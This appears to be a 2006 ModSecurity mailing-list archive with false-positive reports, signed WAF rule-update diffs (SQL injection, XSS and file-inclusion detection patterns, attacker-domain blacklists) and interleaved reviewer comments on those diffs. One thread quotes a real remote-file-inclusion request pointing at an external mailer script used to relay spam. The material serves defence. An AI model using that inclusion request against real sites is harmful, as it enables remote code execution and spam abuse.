From gerard at whitecurve.com Wed Oct 4 04:21:50 2006
From: gerard at whitecurve.com (Gerard Earley)
Date: Wed, 04 Oct 2006 09:21:50 +0100
Subject: [Modsecurity] special phpBB false positive
Message-ID: <45236F1E.6090602@whitecurve.com>

I'm getting a lot of false positives with users posting to phpBB from rule 300016, which is the generic SQL injection rule. The real problem is that the client's company name has the word "union" in it.

Is there a way to check whether a particular word is used with "union" and, if it's there, to NOT trigger the rule?

For example
"blah blah blah union blah blah blah"
would trigger the rule but
"blah blah blah keyword union blah blah blah"
would not.

Any hints?
-------------- next part --------------
A non-text attachment was scrubbed...
Name: smime.p7s
Type: application/x-pkcs7-signature
Size: 3303 bytes
Desc: S/MIME Cryptographic Signature
Url : http://lists.gotroot.com/pipermail/modsecurity/attachments/20061004/c6e2ba9f/attachment.bin

From mike at gotroot.com Mon Oct 9 11:43:07 2006
From: mike at gotroot.com (Michael Shinn)
Date: Mon, 09 Oct 2006 11:43:07 -0400
Subject: [Modsecurity] special phpBB false positive
In-Reply-To: <45236F1E.6090602@whitecurve.com>
References: <45236F1E.6090602@whitecurve.com>
Message-ID: <452A6E0B.9010301@gotroot.com>

Thanks for the report, and sorry to hear that you are having problems. Would it be possible to look at your audit_log entries for these events? If so, I could put together an exclusion to prevent this false positive.

Gerard Earley wrote:
> I'm getting a lot of false positives with users posting to phpBB from
> rule 300016, which is the generic SQL injection rule. The real problem
> is that the client's company name has the word "union" in it.
>
> Is there a way to check whether a particular word is used with
> "union" and, if it's there, to NOT trigger the rule.
>
> For example
> "blah blah blah union blah blah blah"
> would trigger the rule but
> "blah blah blah keyword union blah blah blah"
> would not.
>
> Any hints?
> ------------------------------------------------------------------------
>
> _______________________________________________
> Modsecurity mailing list
> Modsecurity at gotroot.com
> http://lists.gotroot.com/mailman/listinfo/modsecurity
>

From zeki at zeki.ch Tue Oct 10 07:40:45 2006
From: zeki at zeki.ch (Zekeria Oezdemir)
Date: Tue, 10 Oct 2006 13:40:45 +0200
Subject: [Modsecurity] gallery 1.5.4 false positive
Message-ID: <452B86BD.5080406@zeki.ch>

Hello list,

I get this error on Gallery v1.5.4:

[Tue Oct 10 13:30:38 2006] [error] [client x.x.x.x] mod_security: Access denied with code 500. Pattern match "\\\\.php(3|4|5)?(\\\\?|&).*=(ht|f)tps?:/.*(\\\\?|&)" at REQUEST_URI [id "300018"] [rev "1"] [msg "Generic PHP code injection protection"] [severity "CRITICAL"] [hostname "www.domain.ch"] [uri "/pics/do_command.php?return=http%3A%2F%2Fwww.domain.ch%2Fpics%2Fview_album.php&cmd=new-album"]
[Tue Oct 10 13:30:52 2006] [error] [client x.x.x.x] mod_security: Access denied with code 500. Pattern match "\\\\.php(3|4|5)?(\\\\?|&).*=(ht|f)tps?:/.*(\\\\?|&)" at REQUEST_URI [id "300018"] [rev "1"] [msg "Generic PHP code injection protection"] [severity "CRITICAL"] [hostname "www.domain.ch"] [uri "/pics/do_command.php?return=http%3A%2F%2Fwww.domain.ch%2Fpics%2Fview_album.php&cmd=new-album"]

Is it a bug?

Greets,
Zeki

From mike at gotroot.com Tue Oct 10 13:31:30 2006
From: mike at gotroot.com (Michael Shinn)
Date: Tue, 10 Oct 2006 13:31:30 -0400
Subject: [Modsecurity] gallery 1.5.4 false positive
In-Reply-To: <452B86BD.5080406@zeki.ch>
References: <452B86BD.5080406@zeki.ch>
Message-ID: <1160501490.3726.20.camel@localhost.localdomain>

Thanks for the report, yep, it's a bug. Putting out a fix now, should have it up in a jiffy.

On Tue, 2006-10-10 at 13:40 +0200, Zekeria Oezdemir wrote:
> Hello list,
>
> I get this error on Gallery v1.5.4:
>
>
> [Tue Oct 10 13:30:38 2006] [error] [client x.x.x.x] mod_security: Access
> denied with code 500. Pattern match
> "\\\\.php(3|4|5)?(\\\\?|&).*=(ht|f)tps?:/.*(\\\\?|&)" at REQUEST_URI [id
> "300018"] [rev "1"] [msg "Generic PHP code injection protection"]
> [severity "CRITICAL"] [hostname "www.domain.ch"] [uri
> "/pics/do_command.php?return=http%3A%2F%2Fwww.domain.ch%2Fpics%2Fview_album.php&cmd=new-album"]
> [Tue Oct 10 13:30:52 2006] [error] [client x.x.x.x] mod_security: Access
> denied with code 500. Pattern match
> "\\\\.php(3|4|5)?(\\\\?|&).*=(ht|f)tps?:/.*(\\\\?|&)" at REQUEST_URI [id
> "300018"] [rev "1"] [msg "Generic PHP code injection protection"]
> [severity "CRITICAL"] [hostname "www.domain.ch"] [uri
> "/pics/do_command.php?return=http%3A%2F%2Fwww.domain.ch%2Fpics%2Fview_album.php&cmd=new-album"]
>
>
> Is it a bug?
>
> Greets,
> Zeki
> _______________________________________________
> Modsecurity mailing list
> Modsecurity at gotroot.com
> http://lists.gotroot.com/mailman/listinfo/modsecurity
--
Michael T. Shinn
KeyID:0xDAE2EC86
Key Fingerprint: 1884 E657 A6DF DF1B BFB9 E2C5 DCC6 5297 DAE2 EC86
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0xDAE2EC86

Got Root?
http://www.gotroot.com
modsecurity rules: http://www.modsecurityrules.com
Troubleshooting Firewalls: http://troubleshootingfirewalls.com
From mirror at prometheus-group.com Tue Oct 10 13:33:06 2006
From: mirror at prometheus-group.com (mirror at prometheus-group.com)
Date: 10 Oct 2006 13:33:06 -0400
Subject: [Modsecurity] Modsecurity rules update for 20061010
Message-ID: <20061010173306.16281.qmail@plesk.shinn.net>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

New Release of GotRoot Web Signatures

Diff of /etc/modsecurity/apache2-rules.conf
Diff of /etc/modsecurity/blacklist.conf
Diff of /etc/modsecurity/proxy.conf
Diff of /etc/modsecurity/rules.conf
7c7
< # Version: N-20061010-01
---
> # Version: N-20061009-01
182c182
< SecFilterSelective REQUEST_URI "!(/tiki-objectpermissions|aardvarkts/install/index|/do_command|banner_click|wp-login|tiki-view_cache|/horde/index|/horde/services/go|/goto|gallery2?/main|ad-?server/adjs)" "chain,id:300018,rev:2,severity:2,msg:'Generic PHP code injection protection'"
---
> SecFilterSelective REQUEST_URI "!(/tiki-objectpermissions|aardvarkts/install/index|/gallery/do_command|banner_click|wp-login|tiki-view_cache|/horde/index|/horde/services/go|/goto|gallery2?/main|ad-?server/adjs)" "chain,id:300018,rev:1,severity:2,msg:'Generic PHP code injection protection'"
190c190
< SecFilterSelective REQUEST_URI "!(/do_command))" chain
---
> SecFilterSelective REQUEST_URI "!((galler(y|i)/do_command))" chain
Diff of /etc/modsecurity/blacklist2.conf
Diff of /etc/modsecurity/exclude.conf
Diff of /etc/modsecurity/rootkits.conf
Diff of /etc/modsecurity/useragents.conf
Diff of /etc/modsecurity/exclude.conf
Diff of /etc/modsecurity/badips.conf
Diff of /etc/modsecurity/recons.conf
Diff of /etc/modsecurity/jitp.conf
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (GNU/Linux)

iQIVAwUBRSvZUrVvl2Kn6BhaAQLQ6BAA34xr1DPMs91Dm8qZejSCMq4HZFIn0J5l
lyo6Y/dTz60hBLOhmuKTT6ijAJpqWCBGmuTZcVu/T0XJCNYPKQsF7jaFpN3eXVIR
KTJf+R8bC3BYOu+Uc8SGl4caLG1wIKGe3eV/A4VAZGMHeuzlyPUEL4VQfMh5kbk6
ZJwI1UQJmmV2r3dLO1O0cm1WH/eztoqeszVHTqG+FXhIK/65ABPJuWHFmSGrYd+m
H9cZQ1R7ewqoRLEpFNirq4a5SsdltDksfwZRnVNdQTIcwyaiw/HbDbe6JTHzcvSk
FtH83Pb5hYRQ3mNxr7YC6YhwhXJBkFW3zzNcqsb1P61VzgAH9bkaNyqPtB1DTpMW
5zY/f1FAkMx2qODcXXvJlgko56jzWc7ADppS4+4DefpUTG60S5GYxTU1WHH1s0oh
z/i0ZUHAZ+9E683SL5RZicHevSQkMqyrVhCIAuYFxnv0EX4EIKranmrBQQUxbjlF
OYpjg6qFOKzGPFGQit36VigDnbtPIEwuAiF17ULDpqrOU/iaTV/K2BW27thSxhfW
q5+6Sn3UGU+55x1Ro6mli31s6pVOP/IlQxdkNMKrc/pk2KsCHU7zPNM9H3c5uR9j
w3ZEo3z8hN6b/pDhl3fgoAAWNZ40O9u3+q+HWLe/j2XiWsOapYX0Ac5DT3uZG5kq
vufjVOv+UMk=
=4RrZ
-----END PGP SIGNATURE-----
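Review bot: the 182c182 hunk widens the exclusion from `/gallery/do_command` to the bare substring `/do_command`, so any request whose URI contains `/do_command` anywhere is no longer inspected by rule 300018 at all, not only Gallery's script (the `<` side is the new release here, as the version hunk N-20061010-01 against N-20061009-01 shows). Since the reported URI was `/pics/do_command.php`, an exclusion that keeps the script name, e.g. `/do_command\.php`, would cover Gallery installed under any directory while leaving less of the URI space blind to remote-include attempts. The `rev:1` to `rev:2` bump is correct.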
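Review bot: the new side of the 190c190 hunk, `"!(/do_command))"`, has one more closing parenthesis than opening, so the pattern should fail to compile when Apache loads the rule set (PCRE rejects an unmatched closing parenthesis; the N-20061010-02 release two hours later corrects it to `"!(/do_command)"`). Loading the updated rules.conf with `apachectl configtest` before signing and announcing would catch this class of error.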
From mirror at prometheus-group.com Tue Oct 10 15:54:46 2006
From: mirror at prometheus-group.com (mirror at prometheus-group.com)
Date: 10 Oct 2006 15:54:46 -0400
Subject: [Modsecurity] Modsecurity rules update for 20061010
Message-ID: <20061010195446.12249.qmail@plesk.shinn.net>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

New Release of GotRoot Web Signatures

Diff of /etc/modsecurity/apache2-rules.conf
Diff of /etc/modsecurity/blacklist.conf
Diff of /etc/modsecurity/proxy.conf
Diff of /etc/modsecurity/rules.conf
7c7
< # Version: N-20061010-02
---
> # Version: N-20061010-01
190c190
< SecFilterSelective REQUEST_URI "!(/do_command)" chain
---
> SecFilterSelective REQUEST_URI "!(/do_command))" chain
Diff of /etc/modsecurity/blacklist2.conf
Diff of /etc/modsecurity/exclude.conf
Diff of /etc/modsecurity/rootkits.conf
Diff of /etc/modsecurity/useragents.conf
Diff of /etc/modsecurity/exclude.conf
Diff of /etc/modsecurity/badips.conf
Diff of /etc/modsecurity/recons.conf
Diff of /etc/modsecurity/jitp.conf
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (GNU/Linux)

iQIVAwUBRSv6hrVvl2Kn6BhaAQItqBAAnsuyIcnEZcnLB6pGjZZd98arKeFQKAV6
veeIXBEXvcLQyfVsWGNm4j9HRtGBRe3lRfVuNTR7xNOYN4ZGN36Ru9huFwFjnHG3
5YCqyRS0lIgFhktM2xcylhVdURhIHoVWrZkLTqeMsbCyBpz9IdTkSBWFFa9DuIJ+
7fV5FrEdRe4t4/lmo6s2OftvvIP4sB+lKIqYazkUrFXzo6Ts1Qj7Avw/6qjbYm9T
UVPfhDhigvpV+eagzEDn9TRAWH4WAhCR9keZoe6djVacEdv4LZzxJwS7RZwI3KLm
vm/bTYR5Ue2slOdPXx4/jDqwNm1JQrRHyk6KXg/Yb7KxeQ+UlDOV2hKs3C9gkUf+
MmNpAXzr0nL/uD06qcq4Y9/t+EZwG1VKa8SwmxzuX8zm4N0P77vEY4crcqpj62pI
wKaF42KbVSn0zVBU7UdyhQ1muzvYvPtIIt1I8NPHZ6606tGjZCcikeLv1vBO60ep
is4CWYio9TY26yf60PqyYzUzYhR4zZuvMCExll2whuYuDtjjpXaPYG1VtwXdhNPp
r+tPDzYQFLUxPnYMUDWgCeOv2ULOx1ce/Y8HAh7LAWEoKo8X+HeBGgQF8dbc2UNk
Y6anfvlahaQhRxfr+WJKTKrntwGu4qo3azWupZgGIfBjccRrYHLxrn6jOXTo9mez
Dqu2LVcaDSc=
=BtKA
-----END PGP SIGNATURE-----
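Review bot: this 190c190 hunk only balances the parenthesis from N-20061010-01 (`"!(/do_command))"` becomes `"!(/do_command)"`); the announcement should say so explicitly, since anyone who pulled the 01 release has a rules.conf that may not load. The exclusion itself is unchanged: `/do_command` is still an unanchored substring, matched anywhere in the URI, so any script of that name on the server is exempt from this chain.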
From mirror at prometheus-group.com Tue Oct 10 18:42:49 2006
From: mirror at prometheus-group.com (mirror at prometheus-group.com)
Date: 10 Oct 2006 18:42:49 -0400
Subject: [Modsecurity] Modsecurity rules update for 20061010
Message-ID: <20061010224249.13985.qmail@plesk.shinn.net>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

New Release of GotRoot Web Signatures

Diff of /etc/modsecurity/apache2-rules.conf
Diff of /etc/modsecurity/blacklist.conf
Diff of /etc/modsecurity/proxy.conf
Diff of /etc/modsecurity/rules.conf
Diff of /etc/modsecurity/blacklist2.conf
Diff of /etc/modsecurity/exclude.conf
Diff of /etc/modsecurity/rootkits.conf
Diff of /etc/modsecurity/useragents.conf
Diff of /etc/modsecurity/exclude.conf
Diff of /etc/modsecurity/badips.conf
Diff of /etc/modsecurity/recons.conf
Diff of /etc/modsecurity/jitp.conf
4410,4452d4409
< 
< #Eazy Cart Multiple Vulnerabilities
< SecFilterSelective REQUEST_URI "easycart\.php" "chain,id:390154,rev:1,severity:2,msg:'JITP: Eazy Cart SQL injection'"
< SecFilterSelective ARG_price "((select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]|\'|UNION.*SELECT.*FROM)"
< SecFilterSelective REQUEST_URI "admin/config/customer\.dat" "id:390155,rev:1,severity:2,msg:'JITP: Eazy Cart Customer Data Access'"
< SecFilterSelective REQUEST_URI "easycart\.php" "chain,id:390156,rev:1,severity:2,msg:'JITP: Eazy Cart XSS ATTACK'"
< SecFilterSelective ARGS "<[[:space:]]*(script|about|applet|activex|chrome).*(script|about|applet|activex|chrome)[[:space:]]*>"
< 
< #WebYep "webyep_sIncludePath" File Inclusion Vulnerabilities
< SecFilterSelective REQUEST_URI "webyep-system/program/((lib|elements)/|webyep\.php)" "chain,id:390157,rev:1,severity:2,msg:'JITP: WebYep webyep_sIncludePath File Inclusion Vulnerabilities'"
< SecFilterSelective ARG_webyep_sIncludePath "((ht|f)tps?:/|\.\./\.\.)"
< 
< #Travelsized CMS "setup_folder" File Inclusion Vulnerability
< SecFilterSelective REQUEST_URI "frontpage\.php" "chain,id:390158,rev:1,severity:2,msg:'JITP: Travelsized CMS setup_folder File Inclusion Vulnerabilities'"
< SecFilterSelective ARG_setup_folder "((ht|f)tps?:/|\.\./\.\.)"
< 
< #VideoDB "config[pdf_module]" File Inclusion Vulnerability
< SecFilterSelective REQUEST_URI "core/pdf\.php" "chain,id:390159,rev:1,severity:2,msg:'JITP: VideoDB File Inclusion Vulnerabilities'"
< SecFilterSelective REQUEST_URI "config\[pdf_module\].*((ht|f)tps?:/|\.\./\.\.)"
< 
< #AllMyGuests "_AMGconfig[cfg_serverpath]" File Inclusion
< SecFilterSelective REQUEST_URI "signin\.php" "chain,id:390160,rev:1,severity:2,msg:'JITP: AllMyGuests File Inclusion Vulnerabilities'"
< SecFilterSelective REQUEST_URI "_AMGconfig\[cfg_serverpath\].*((ht|f)tps?:/|\.\./\.\.)"
< 
< #OpenBiblio Local File Inclusion and SQL Injection
< SecFilterSelective REQUEST_URI "shared/(header|help)\.php" "chain,id:390161,rev:1,severity:2,msg:'JITP: OpenBiblio File Inclusion Vulnerabilities'"
< SecFilterSelective ARGS "(((ht|f)tps?:/|\.\./\.\.)|((select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]|\'|UNION.*SELECT.*FROM))"
< 
< #BasiliX "BSX_LIBDIR" File Inclusion Vulnerabilities
< SecFilterSelective REQUEST_URI "\.php" "chain,id:390162,rev:1,severity:2,msg:'JITP: BasiliX BSX_LIBDIR File Inclusion Vulnerabilities'"
< SecFilterSelective ARG_BSX_LIBDIR "((ht|f)tps?:/|\.\./\.\.)"
< 
< #PowerPortal "file_name[]" File Inclusion Vulnerability
< SecFilterSelective REQUEST_URI "index\.php" "chain,id:390163,rev:1,severity:2,msg:'JITP: Powerportal File Inclusion Vulnerabilities'"
< SecFilterSelective REQUEST_URI "file_name\[\].*((ht|f)tps?:/|\.\./\.\.)"
< 
< #DeluxeBB "templatefolder" File Inclusion Vulnerability
< SecFilterSelective REQUEST_URI "/templates/.*/.*/.*\.php" "chain,id:390164,rev:1,severity:2,msg:'JITP: DeluxeBB teplatefolder File Inclusion Vulnerabilities'"
< SecFilterSelective ARG_templatefolder "((ht|f)tps?:/|\.\./\.\.)"
< 
< #TagIt! Tagboard "page" File Inclusion Vulnerability
< SecFilterSelective REQUEST_URI "/index\.php" "chain,id:390165,rev:1,severity:2,msg:'JITP: Tagit page File Inclusion Vulnerabilities'"
< SecFilterSelective ARG_page "(ht|f)tps?:/"
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (GNU/Linux)

iQIVAwUBRSwh6bVvl2Kn6BhaAQKUmRAAgZ0M75l7VZgI4buCm1r0EVJozuzFTsO3
kb/PeSfNihZz3aMsPmzqk1a9Ur34V1p6lQooRgmoXlT//wflnVfAmRRy2qobpo4w
ZpTtS2GNk6mdW5NdcgcWbu0H/NA6wC+M0cl1Xyiu7d2lMm/QFAqIEagp66wJX8fp
n++du8IAE+ALyh5fKymzgaoCTQyego+soJVItq/R6n5XrPqcKcebVUwAV4DDB3JF
OdWBBfeE1/Lw5qbV5P9qK8MLa20NBJBTXK6aY+m+feiaMJTQspt8Jm3nu3ZB2Jey
O/xtziQTai1O9SbfT9MM1etOd8xHVVXqD+pwAdLwf91aEPLJ7J4CxdpBR0aUtzoF
brLcNwlDcNosnO4+X32WdYXHHm+1ehJPhnFQz7zc0C+fW/jMxEjAq4/5/NMxZHzD
WzBvKTTUvv0gLZzcuKEOPwVX1O0JQF5/YBMno7wPWaY4vTss0xY+O5OFR2dq5xgw
uNn3EAQKyeeFOms0h1oDijTa9EdOMnYoY0Jl5FpnHvr4sFYpS180FeP9WaU+OByS
gw+I9CAiFxgFzzkE8V8Wcu9LVbq7wqjaN4o/OSWU3Te3OE/P1kDaTrD6rUnJCYSZ
xztxNQhbOI8HDN6909BZnPbcf6FOla03n5TAnjZcccvhH2TU91t9fGlRjoNsHtP2
Xd4dJCAf6FA=
=d5mZ
-----END PGP SIGNATURE-----
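Review bot: three of the new JITP chains in the 4410,4452d4409 hunk (390159, 390160 and 390163) look for the vulnerable parameter in REQUEST_URI only (`config\[pdf_module\].*…`, `_AMGconfig\[cfg_serverpath\].*…`, `file_name\[\].*…`), so the same parameter delivered in a POST body is not inspected; an ARGS target, as 390161 already uses, covers both the query string and the payload. Smaller points in the same hunk: 390165 checks only `(ht|f)tps?:/` and drops the `\.\./\.\.` traversal alternative every other inclusion rule carries, and the msg on 390164 reads 'teplatefolder'. The hunk header shows these lines as a deletion (`d`) because the diff is taken new-against-old, as the version hunks in the other announcements show; the `<` lines are the additions.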
From mirror at prometheus-group.com Tue Oct 10 18:45:05 2006
From: mirror at prometheus-group.com (mirror at prometheus-group.com)
Date: 10 Oct 2006 18:45:05 -0400
Subject: [Modsecurity] Modsecurity rules update for 20061010
Message-ID: <20061010224505.30565.qmail@plesk.shinn.net>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

New Release of GotRoot Web Signatures

Diff of /etc/modsecurity/apache2-rules.conf
Diff of /etc/modsecurity/blacklist.conf
Diff of /etc/modsecurity/proxy.conf
Diff of /etc/modsecurity/rules.conf
Diff of /etc/modsecurity/blacklist2.conf
13c13
< # Version: N-20061010-01
---
> # Version: N-20061008-02
34d33
< SecFilterSelective THE_REQUEST "(\.|/)elektroteh\.com/"
Diff of /etc/modsecurity/exclude.conf
Diff of /etc/modsecurity/rootkits.conf
Diff of /etc/modsecurity/useragents.conf
Diff of /etc/modsecurity/exclude.conf
Diff of /etc/modsecurity/badips.conf
Diff of /etc/modsecurity/recons.conf
Diff of /etc/modsecurity/jitp.conf
5c5
< # Version: N-20061010-01
---
> # Version: N-20061005-01
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (GNU/Linux)

iQIVAwUBRSwicLVvl2Kn6BhaAQIcZw/+KjbQ67luNKERimoEF4AL4zbOwKwVUjEF
CDFfjD9MhAQzWOA+vwfJp0i7B+t/tK025fkEt/HRgqH3GnqSXriqcPoc+FZh+kri
/uLuG5PjTedeI1Os1X0+Tg0vpPEFnb2SDk7Mbxck6uAuAf+scuQUn3GBM4hMDEMU
MQviKIlOmTwbfku9oz4dlfQgtc0osftkfqomvuAXCn6i0BpjiBDG3fvw14pKinwB
xVkvLSbhC+/pKm2L7T1TqxBIArCIV7vFkMtlF765p9aHNHB5K+1kqDtDVpOACWlw
4wuh3vNfmoG5Gf+Dc4iHIzlpMtH3+KcgwkSSS+Ef34iIt07Oh7B90z6ciaacm8d1
Oe23wcJvfZQz6Al3IrLnKsytKNGB9fTRoN4jHGi8m6+wLkXInoLLQs0cxxiPN1nh
QveOtXoHUSFjR6GY0YTscjjh5p4f9vSVrKU4iQ4aCrr+gCKGv8gjsnIMSTrnYi9V
UhnnkGef7jKnJmUQd86/oHSdM4BX91SSZhOg+cH+vg6FTHWY70/90XzQgJnU9Mul
DlnscfWDKx2d4HBVKfE5AB5G/TLTapDQvv9OYZGFj1vmbU/kQx6Cq+QohSUJ7M0m
fxM1P0Ab+Gk52PAH6THlzX0U4tJSfsx0CfohgHQOerIDsWpZKOYdUcfHOqzewER+
nqkoCLifhKo=
=gPNK
-----END PGP SIGNATURE-----
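Review bot: the new blacklist entry in the 34d33 hunk, `SecFilterSelective THE_REQUEST "(\.|/)elektroteh\.com/"`, carries no `id:` action, unlike the numbered rules, so a site that needs to exempt one path from it has nothing to reference; Steve West runs into exactly this gap further down the archive with another id-less rule. It also matches the domain anywhere in the request line, so a legitimate link to that domain carried in a query-string value is blocked as well; that is probably intended for a blacklist entry, but it is worth documenting next to it.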
From lists at 323inc.com Fri Oct 13 15:59:26 2006
From: lists at 323inc.com (MIKE YRABEDRA)
Date: Fri, 13 Oct 2006 15:59:26 -0400
Subject: [Modsecurity] Spam injection, very sneaky
Message-ID:

Hey folks,

I have been using modsec to block all sorts of spam injection, but I have found a new one.

I have a client that has a blanket-style page that includes anything sent to it. Like so...

So if someone does this...

http://www.somesite.com/folder/index.php?content=http://home.arcor.de/dumpxpl/mail.php?

...bad things happen. In my case over 100k of spam being relayed by my server.

I caught this guy using modsec and searching ARGS with the same text as in the spam. This is OK for now, until he uses a different spam.

The php script that did the damage can be seen here...
http://home.arcor.de/dumpxpl/mail.php

Is there a modsec rule that will prevent this sort of thing?

TIA

--
Mike Yrabedra
B^)>

From michal at sabren.com Fri Oct 13 17:11:47 2006
From: michal at sabren.com (Michal Wallace)
Date: Fri, 13 Oct 2006 17:11:47 -0400 (EDT)
Subject: [Modsecurity] Spam injection, very sneaky
In-Reply-To:
References:
Message-ID:

On Fri, 13 Oct 2006, MIKE YRABEDRA wrote:

> I have been using modsec to block all sorts of spam injection, but I have
> found a new one.
>
> I have a client that has a blanket-style page that includes anything sent
> to it. Like so...
>
>
>
> So if someone does this...
>
> http://www.somesite.com/folder/index.php?content=http://home.arcor.de/dumpxpl/mail.php?
>
> ...bad things happen. In my case over 100k of spam being relayed by my
> server.
>
> I caught this guy using modsec and searching ARGS with the same text as in
> the spam. This is OK for now, until he uses a different spam.
>
>
> The php script that did the damage can be seen here...
> http://home.arcor.de/dumpxpl/mail.php
>
> Is there a modsec rule that will prevent this sort of thing?

Hey Mike,

PHP's remote include "feature" is wrong on so many levels. One thing you can do in this case is have the client sanitize the $content variable so it doesn't do this. There's usually no reason it has to have the http:// in there, and if there is, you can limit it to the sites he actually wants to use.

Or he could just fetch the url and print the contents, rather than using include().

Or you could patch PHP so it doesn't let this happen:

http://www.hardened-php.net/

At the very least, you should scan for http:// in the args. I'm surprised the gotroot rules didn't catch this. I'm pretty sure there was a rule that did this already for any php file.

Sincerely,

Michal J Wallace
Sabren Enterprises, Inc.
-------------------------------------
contact: michal at sabren.com
hosting: http://www.cornerhost.com/
my site: http://www.withoutane.com/
-------------------------------------

From mike at gotroot.com Fri Oct 13 23:18:31 2006
From: mike at gotroot.com (Michael Shinn)
Date: Fri, 13 Oct 2006 23:18:31 -0400
Subject: [Modsecurity] Spam injection, very sneaky
In-Reply-To:
References:
Message-ID: <1160795911.4119.10.camel@localhost.localdomain>

Thank you all for the report. The generic sigs should have caught this, but I'm never happy with a should, so I just tuned this sig to make it even broader in case I missed something (please let me know about all false positives). I just added another rule to catch any other variations of this I might have missed. To that end, if anyone sees rule 300040 fire (ever!) please let me know and send me your audit_log entries. This should catch the exception that I just can't presently imagine, and I always appreciate new opportunities to make the sigs better.

Thank you again for the report, please keep them coming as I'm always happy to make more sigs. :-)

New release coming out in a few minutes.

On Fri, 2006-10-13 at 17:11 -0400, Michal Wallace wrote:
> On Fri, 13 Oct 2006, MIKE YRABEDRA wrote:
>
> > I have been using modsec to block all sorts of spam injection, but I have
> > found a new one.
> >
> > I have a client that has a blanket-style page that includes anything sent
> > to it. Like so...
> >
> >
> >
> > So if someone does this...
> >
> > http://www.somesite.com/folder/index.php?content=http://home.arcor.de/dumpxpl/mail.php?
> >
> > ...bad things happen. In my case over 100k of spam being relayed by my
> > server.
> >
> > I caught this guy using modsec and searching ARGS with the same text as in
> > the spam. This is OK for now, until he uses a different spam.
> >
> >
> > The php script that did the damage can be seen here...
> > http://home.arcor.de/dumpxpl/mail.php
> >
> > Is there a modsec rule that will prevent this sort of thing?
>
> Hey Mike,
>
> PHP's remote include "feature" is wrong
> on so many levels. One thing you can do in
> this case is have the client sanitize the
> $content variable so it doesn't do this.
> There's usually no reason it has to have
> the http:// in there, and if there is,
> you can limit it to the sites he actually
> wants to use.
>
> Or he could just fetch the url and print
> the contents, rather than using include().
>
> Or you could patch PHP so it doesn't let
> this happen:
>
> http://www.hardened-php.net/
>
> At the very least, you should scan for
> http:// in the args. I'm surprised the gotroot
> rules didn't catch this. I'm pretty sure
> there was a rule that did this already for
> any php file.
>
> Sincerely,
>
> Michal J Wallace
> Sabren Enterprises, Inc.
> -------------------------------------
> contact: michal at sabren.com
> hosting: http://www.cornerhost.com/
> my site: http://www.withoutane.com/
> -------------------------------------
>
> _______________________________________________
> Modsecurity mailing list
> Modsecurity at gotroot.com
> http://lists.gotroot.com/mailman/listinfo/modsecurity
--
Michael T. Shinn
KeyID:0xDAE2EC86
Key Fingerprint: 1884 E657 A6DF DF1B BFB9 E2C5 DCC6 5297 DAE2 EC86
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0xDAE2EC86

Got Root?
http://www.gotroot.com
modsecurity rules: http://www.modsecurityrules.com
Troubleshooting Firewalls: http://troubleshootingfirewalls.com
From mirror at prometheus-group.com Fri Oct 13 23:20:42 2006
From: mirror at prometheus-group.com (mirror at prometheus-group.com)
Date: 13 Oct 2006 23:20:42 -0400
Subject: [Modsecurity] Modsecurity rules update for 20061013
Message-ID: <20061014032042.5444.qmail@plesk.shinn.net>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

New Release of GotRoot Web Signatures

Diff of /etc/modsecurity/apache2-rules.conf
Diff of /etc/modsecurity/blacklist.conf
Diff of /etc/modsecurity/proxy.conf
Diff of /etc/modsecurity/rules.conf
7c7
< # Version: N-20061013-02
---
> # Version: N-20061010-02
174c174
< #Generic PHP remote file inclusion attack signature with command
---
> #Generic PHP remote file inclusion attack signature
181,186c181,183
< SecFilterSelective REQUEST_URI "!(/tiki-objectpermissions|aardvarkts/install/index|/do_command|banner_click|wp-login|tiki-view_cache|/horde/index|/horde/services/go|/goto|gallery2?/main|ad-?server/adjs)" "chain,id:300018,rev:3,severity:2,msg:'Generic PHP code injection protection via ARGS'"
< SecFilterSelective REQUEST_URI "\.php(3|4|5)?(\?|&)" chain
< SecFilterSelective ARGS "(ht|f)tps?:/"
< SecFilterSelective REQUEST_URI "!(/tiki-objectpermissions|aardvarkts/install/index|/do_command|banner_click|wp-login|tiki-view_cache|/horde/index|/horde/services/go|/goto|gallery2?/main|ad-?server/adjs)" "chain,id:300040,rev:1,severity:2,msg:'Generic PHP code injection protection in URI'"
< SecFilterSelective REQUEST_URI "\.php(3|4|5)?(\?|&).*=(ht|f)tps?:/"
< 
---
> #MTS
> SecFilterSelective REQUEST_URI "!(/tiki-objectpermissions|aardvarkts/install/index|/do_command|banner_click|wp-login|tiki-view_cache|/horde/index|/horde/services/go|/goto|gallery2?/main|ad-?server/adjs)" "chain,id:300018,rev:2,severity:2,msg:'Generic PHP code injection protection'"
> SecFilterSelective REQUEST_URI "\.php(3|4|5)?(\?|&).*=(ht|f)tps?:/.*(\?|&)"
Diff of /etc/modsecurity/blacklist2.conf
124c124
< #SecFilterSelective THE_REQUEST "home\.arcor\.de"
---
> SecFilterSelective THE_REQUEST "home\.arcor\.de"
Diff of /etc/modsecurity/exclude.conf
Diff of /etc/modsecurity/rootkits.conf
Diff of /etc/modsecurity/useragents.conf
Diff of /etc/modsecurity/exclude.conf
Diff of /etc/modsecurity/badips.conf
Diff of /etc/modsecurity/recons.conf
Diff of /etc/modsecurity/jitp.conf
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (GNU/Linux)

iQIVAwUBRTBXirVvl2Kn6BhaAQLMlQ/9GOFgzJqg2UPzJp/b1E3zrvwVjPUaLORA
yHyuZUJywIxGtd6h1iaI2UnoLhhBFsURKY3NQKV9DJFZT5uN01FshssAOV/3SP1P
DxiTc3jor+MdaRzAReoRcGbnXPZnax4cqHMDcaT4fqxglvheeYosrh/XXcleAOH5
